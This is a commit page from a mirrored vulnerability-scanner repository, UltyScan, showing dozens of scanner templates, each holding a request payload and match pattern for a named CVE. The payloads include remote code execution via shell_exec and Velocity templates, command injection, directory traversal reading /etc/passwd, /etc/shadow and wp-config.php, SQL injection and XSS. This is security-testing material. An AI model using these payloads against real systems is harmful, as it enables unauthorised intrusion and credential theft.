dennii/UltyScan
1
0
Fork 0
mirror of https://github.com/DeNNiiInc/UltyScan.git synced 2026-04-17 20:35:59 +00:00
Code Issues Packages Projects Releases Wiki Activity

UltyScan Documentation Overhaul

Browse Source
This commit is contained in:
DeNNiiInc
2026-01-01 16:33:22 +11:00
commit f046dee832
294 changed files with 250370 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

9
templates/active/AWS_S3_Public_Bucket_Listing.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='AWS S3 Public Bucket Listing'
URI=''
METHOD='GET'
MATCH="listbucket"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/ApPHP_MicroBlog_Remote_Code_Execution_Vulnerability.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='ApPHP MicroBlog Remote Code Execution Vulnerability'
URI='/index.php?b);phpinfo();echo(base64_decode('T3BlblZBUwo')=/'
METHOD='GET'
MATCH="<title>phpinfo\(\)"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/Apache_Solr_Scanner.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='Apache Solr Detected'
URI=''
METHOD='GET'
MATCH="Solr\ Admin"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/Apache_Tomcat_Scanner.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='Apache Tomcat Detected'
URI='/404_DOES_NOT_EXIST'
METHOD='GET'
MATCH="Apache\ Tomcat\/[0-9]?[0-9]\.[0-9]?[0-9]\.[0-9]?[0-9]"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-o'

9
templates/active/AvantFAX_LOGIN_Detected.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='AvantFAX LOGIN Detected'
URI=''
METHOD='GET'
MATCH="AvantFAX\ LOGIN"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2018-13379_-_Fortigate_Pulse_Connect_Secure_Directory_Traversal.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2018-13379 - Fortigate Pulse Connect Secure Directory Traversal'
URI='/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'
METHOD='GET'
MATCH='\.\.\.\.\.\.\.\.\.\.\.\.\.'
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-11510_-_Pulse_Connect_Secure_SSL_VPN_Arbitrary_File_Read.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-11510 - Pulse Connect Secure SSL VPN Arbitrary File Read'
URI='/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'
METHOD='GET'
MATCH="root:*:"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-11580_-_Atlassian_Crowd_Data_Center_Unauthenticated_RCE.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-11580 - Atlassian Crowd Data Center Unauthenticated RCE'
URI='/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow'
METHOD='GET'
MATCH="root:*:"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-11581_-_Jira_Template_Injection.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-11581 - Jira Template Injection'
URI='/secure/ContactAdministrators!default.jspa'
METHOD='GET'
MATCH='Contact Site Administrators'
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-1653_-_Cisco_RV320_RV326_Configuration_Disclosure.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-1653 - Cisco RV320 RV326 Configuration Disclosure'
URI="/cgi-bin/config.exp"
METHOD='GET'
MATCH="sysconfig"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-16662_-_rConfig_3.9.2_Remote_Code_Execution.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-16662 - rConfig 3.9.2 Remote Code Execution'
URI='/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23'
METHOD='GET'
MATCH="root:*:"
SEVERITY='P1 - CRITICAL'
CURL_OPTS='--user-agent "" -s -L --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-16759_-_vBulletin_5.x_0-Day_Pre-Auth_Remote_Command_Execution.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-16759 - vBulletin 5.x 0-Day Pre-Auth Remote Command Execution'
URI='/'
METHOD='POST'
MATCH='1787569'
SEVERITY='P1 - CRITICAL'
CURL_OPTS='-d "routestring=ajax%2Frender%2Fwidget_php&widgetConfig%5Bcode%5D=echo+shell_exec%28%27echo+$((1%2B1787568))%27%29%3B+exit%3B" -H "Content-Type: application/x-www-form-urlencoded" --user-agent "" -s -L --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-16759_-_vBulletin_5.x_0-Day_Pre-Auth_Remote_Command_Execution_Bypass.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-16759 - vBulletin 5.x 0-Day Pre-Auth Remote Command Execution Bypass'
URI='/ajax/render/widget_tabbedcontainer_tab_panel'
METHOD='POST'
MATCH='PHP\ Version'
SEVERITY='P1 - CRITICAL'
CURL_OPTS='-d "subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();" -H "Content-Type: application/x-www-form-urlencoded" --user-agent "" -s -L --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-17558_-_Apache_Solr_RCE.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-17558 - Apache Solr RCE'
URI='/solr/dovecot/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27cat%20/etc/passwd%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'
METHOD='GET'
MATCH="root:*:"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

14
templates/active/CVE-2019-19719_Tableau_Server_DOM_XSS.py Normal file
View File

@@ -0,0 +1,14 @@
# Import any WebDriver class that you would usually import from
# selenium.webdriver from the seleniumrequests module
import sys
from seleniumrequests import Firefox
url = sys.argv[1]
# Simple usage with built-in WebDrivers:
webdriver = Firefox()
response = webdriver.request('GET', '%s/en/embeddedAuthRedirect.html?auth=javascript:document.write(1+1336)' % url)
if '1337' in response.text:
print("Vulnerable!")
print(response.text)
webdriver.quit()
SECONDARY_COMMANDS=''

9
templates/active/CVE-2019-19781_-_Citrix_ADC_Directory_Traversal.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-19781 - Citrix ADC Directory Traversal'
URI='/vpn/../vpns/cfg/smb.conf'
METHOD='GET'
MATCH='\[global\]'
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-19908_-_phpMyChat-Plus_XSS.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-19908 - phpMyChat-Plus XSS'
URI="/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E"
METHOD='GET'
MATCH="<script>alert\(1337\)<\/script>"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-5418_-_Rail_File_Content_Disclosure.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-5418 - File Content Disclosure on Rails'
URI="/../../../../../../../../etc/passwd\{\{"
METHOD='GET'
MATCH="root:*:"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-6340_-_Drupal8_REST_RCE_SA-CORE-2019-003.disabled Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-6340 - Drupal8 REST RCE SA-CORE-2019-003'
URI='/node/1?_format=hal_json'
METHOD='GET'
MATCH='INVALID_VALUE\ does\ not\ correspond'
SEVERITY='P1 - CRITICAL'
CURL_OPTS='--user-agent "" -s -L --insecure -H "Content-Type: application/hal+json" --data \'{ "_links": { "type": { "href": "http://192.168.56.101/drupal-8.6.9/rest/type/node/INVALID_VALUE" } }, "type": { "target_id": "article" }, "title": { "value": "My Article" }, "body": { "value": "some body content aaa bbb ccc" }}\' '
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-7192_-_QNAP_Pre-Auth_Root_RCE.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-7192 - QNAP Pre-Auth Root RCE'
URI='/photo/p/api/video.php'
METHOD='GET'
MATCH="\[\ 401\ Unauthorized\ \]"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-8442_-_Jira_Webroot_Directory_Traversal_1.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-8442 - Jira Webroot Directory Traversal 1'
URI="/s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"
METHOD='GET'
MATCH='artifactId'
SEVERITY='P2 - HIGH'
CURL_OPTS='-L --user-agent '' -s --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-8442_-_Jira_Webroot_Directory_Traversal_2.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-8442 - Jira Webroot Directory Traversal 2'
URI="/s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties"
METHOD='GET'
MATCH='artifactId'
SEVERITY='P2 - HIGH'
CURL_OPTS='-L --user-agent '' -s --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-8451_Jira_SSRF_1.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-8451 Jira SSRF 1'
URI="/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com"
METHOD='GET'
MATCH='<title>Google</title>'
SEVERITY='P3 - MEDIUM'
CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-8451_Jira_SSRF_2.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-8451 Jira SSRF 2'
URI="/jira/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com"
METHOD='GET'
MATCH='<title>Google</title>'
SEVERITY='P3 - MEDIUM'
CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-8451_Jira_SSRF_3.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-8451 Jira SSRF 3'
URI="/wiki/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com"
METHOD='GET'
MATCH='<title>Google</title>'
SEVERITY='P3 - MEDIUM'
CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-8451_Jira_SSRF_4.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-8451 Jira SSRF 4'
URI="/confluence/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com"
METHOD='GET'
MATCH='<title>Google</title>'
SEVERITY='P3 - MEDIUM'
CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-8903_-_Totaljs_Unathenticated_Directory_Traversal.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-8903 - Totaljs - Unathenticated Directory Traversal'
URI="/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html"
METHOD='GET'
MATCH="apache2\.conf"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2019-8982_-_Wavemaker_Studio_6.6_LFI_SSRF.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-8982 - Wavemaker Studio 6.6 LFI/SSRF'
URI="/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd"
METHOD='GET'
MATCH="root:*:"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-0618_-_Remote_Code_Execution_SQL_Server_Reporting_Services.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-0618 - Remote Code Execution SQL Server Reporting Services'
URI="/ReportServer/Pages/ReportViewer.aspx"
METHOD='GET'
MATCH="view\ report"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s --insecure -I "
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-10204_-_Sonatype_Nexus_Repository_RCE.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-10204 - Sonatype Nexus Repository RCE'
URI="/extdirect"
METHOD='POST'
MATCH="1787569"
SEVERITY='P1 - CRITICAL'
CURL_OPTS='--user-agent '' -s --insecure -L --data \'{"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{1337*1337"]}],"type":"rpc","tid":28}\'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-1147_-_Remote_Code_Execution_in_Microsoft_SharePoint_Server.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-1147 - Remote Code Execution in Microsoft SharePoint Server'
URI="/_layouts/15/listform.aspx?PageType=1&ListId=%7B13371337-1337-1337-1337-133713371337%7D"
METHOD='GET'
MATCH="List\ does\ not\ exist|It\ may\ have\ been\ deleted\ by\ another\ user"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s --insecure -I "
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-11530_-_Wordpress_Chop_Slider_3_Plugin_SQL_Injection.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-11530 - Wordpress Chop Slider 3 Plugin SQL Injection'
URI='/wp-content/plugins/chopslider/get_script/index.php?id=1111111'
METHOD='GET'
MATCH='chopslider_id_1111111'
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-11738 - WordPress Duplicator plugin Directory Traversal'
URI="/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
METHOD='GET'
MATCH="root\:x"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_2.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-11738 - WordPress Duplicator plugin Directory Traversal 2'
URI="/wordpress/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
METHOD='GET'
MATCH="root\:x"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_3.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-11738 - WordPress Duplicator plugin Directory Traversal 3'
URI="/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"
METHOD='GET'
MATCH="DB_NAME|DB_USER|COLLATE"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_4.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-11738 - WordPress Duplicator plugin Directory Traversal 4'
URI="/wordpress/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"
METHOD='GET'
MATCH="DB_NAME|DB_USER|COLLATE"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-12271_-_Sophos_XG_Firewall_Pre-Auth_SQL_Injection.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-12271 - Sophos XG Firewall Pre-Auth SQL Injection'
URI='/userportal/webpages/myaccount/login.jsp'
METHOD='GET'
MATCH='loginstylesheet'
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-12720_-_vBulletin_Unauthenticaed_SQLi_1.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-12720 - vBulletin Unauthenticaed SQLi 1'
URI="/ajax/api/content_infraction/getIndexableContent"
METHOD='POST'
MATCH="6162636D31|database\ error"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: "XMLHttpRequest"' --data \"nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,HEX('abcm1'),8,7,6,5,4,3,2,1+from+user+where+userid=1--\" "
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-12720_-_vBulletin_Unauthenticaed_SQLi_2.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-12720 - vBulletin Unauthenticaed SQLi 2'
URI="/vb5/ajax/api/content_infraction/getIndexableContent"
METHOD='POST'
MATCH="6162636D31|database\ error"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: "XMLHttpRequest"' --data \"nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,HEX('abcm1'),8,7,6,5,4,3,2,1+from+user+where+userid=1--\" "
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-12720_-_vBulletin_Unauthenticaed_SQLi_3.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-12720 - vBulletin Unauthenticaed SQLi 3'
URI="/vb5/ajax/api/content_infraction/getIndexableContent"
METHOD='POST'
MATCH="vbulletinrce"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: "XMLHttpRequest"' --data \"nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-\" "
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-13167_-_Netsweeper_WebAdmin_Python_Code_Injection_1.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-13167 - Netsweeper WebAdmin unixlogin.php Python Code Injection 1'
URI="/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5"
METHOD='GET'
MATCH="nonexistent"
SEVERITY='P1 - CRITICAL'
CURL_OPTS=' --user-agent '' -s -L --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-13167_-_Netsweeper_WebAdmin_Python_Code_Injection_2.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-13167 - Netsweeper WebAdmin unixlogin.php Python Code Injection 2'
URI="/webadmin/out"
METHOD='GET'
MATCH="nonexistent"
SEVERITY='P1 - CRITICAL'
CURL_OPTS=' --user-agent '' -s -L --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-14181_-_User_Enumeration_Via_Insecure_Jira_Endpoint.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-14181 - User Enumeration Via Insecure Jira Endpoint'
URI="/secure/ViewUserHover.jspa?username=randomUser"
METHOD='GET'
MATCH="User\ does\ not\ exist"
SEVERITY='P3 - MEDIUM'
CURL_OPTS="--user-agent '' -s --insecure -L "
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-14815_-_Oracle_Business_Intelligence_Enterprise_DOM_XSS.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-14815 - Oracle Business Intelligence Enterprise DOM XSS'
URI='/bi-security-login/login.jsp?msi=false&redirect="><img/src/onerror%3dalert(document.domain)>'
METHOD='GET'
MATCH="Oracle\ Business\ Intelligence"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-15129_-_Open_Redirect_In_Traefik.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-15129 - Open Redirect In Traefik'
URI='/'
METHOD='GET'
MATCH="<a href=\"https://google.com/dashboard/\">Found</a>"
SEVERITY='P3 - MEDIUM'
CURL_OPTS="--user-agent '' -s -L --insecure -H 'X-Forwarded-Prefix: https://google.com'"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-15920_-_Mida_eFramework_Unauthenticated_RCE.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-15920 - Mida eFramework Unauthenticated RCE'
URI='/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING'
METHOD='GET'
MATCH='root\:'
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-17519_-_Apache_Flink_Path_Traversal.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-17519 - Apache Flink Path Traversal'
URI="/jobmanager/logs/..%252f..%252f..%252f......%252f..%252fetc%252fpasswd"
METHOD='GET'
MATCH="root:*:"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-2034_-_PAN-OS_GlobalProtect_OS_Command_Injection.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-2034 - PAN-OS GlobalProtect OS Command Injection'
URI='/global-protect/login.esp'
METHOD='GET'
MATCH='ETag|Last-Modified'
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS=''

9
templates/active/CVE-2020-2096_-_Jenkins_Gitlab_Hook_XSS.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-2096 - Jenkins Gitlab Hook XSS'
URI="/gitlab/build_now%3Csvg/onload=alert(1337)%3E"
METHOD='GET'
MATCH="<svg/onload=alert\(1337\)>"
SEVERITY='P3 - MEDIUM'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_1.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 1'
URI="/git/build_now/a'\">%3Csvg/onload=alert(1337)%3E"
METHOD='GET'
MATCH="<svg/onload=alert\(1337\)>"
SEVERITY='P3 - MEDIUM'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_2.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 2'
URI="/jenkins/git/build_now/a'\">%3Csvg/onload=alert(1337)%3E"
METHOD='GET'
MATCH="<svg/onload=alert\(1337\)>"
SEVERITY='P3 - MEDIUM'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_3.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 3'
URI="/gitlab/build_now/a'\">%3Csvg/onload=alert(1337)%3E"
METHOD='GET'
MATCH="<svg/onload=alert\(1337\)>"
SEVERITY='P3 - MEDIUM'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'

9
templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_4.sh Normal file
View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 4'
URI="/jenkins/gitlab/build_now/a'\">%3Csvg/onload=alert(1337)%3E"
